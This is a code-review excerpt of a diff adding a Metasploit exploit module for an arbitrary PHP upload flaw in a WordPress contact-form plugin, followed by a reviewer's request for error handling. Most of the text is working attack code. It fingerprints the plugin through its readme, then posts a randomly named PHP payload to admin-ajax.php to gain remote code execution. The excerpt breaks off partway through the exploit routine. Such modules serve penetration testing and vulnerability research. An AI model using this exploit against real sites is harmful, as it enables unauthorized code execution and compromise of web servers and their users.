modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb

```diff
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
+        plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'Claudio Viviani', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
+          ['WPVDB', '7896']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['N-Media WebSite Contact Form 1.3.4', {}]],
+      'DisclosureDate' => 'Apr 12 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'website-contact-form-with-file-upload', 'readme.txt')
+    )
+
+    if res && res.code == 200 && res.body =~ /N-Media Website Contact Form/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="action"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
+    data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    })
+
+    if res && res.code == 200 && res.body =~ /filename/
+      new_php_pagename = JSON.parse(res.body)["filename"]
```

Comment:
Could you please add a JSON::ParserError exception handler here?

```
begin
  new_php_pagename = JSON.parse(res.body)["filename"]
rescue JSON::ParserError
  new_php_pagename = ''
end
```

Like that. And maybe check  new_php_pagename?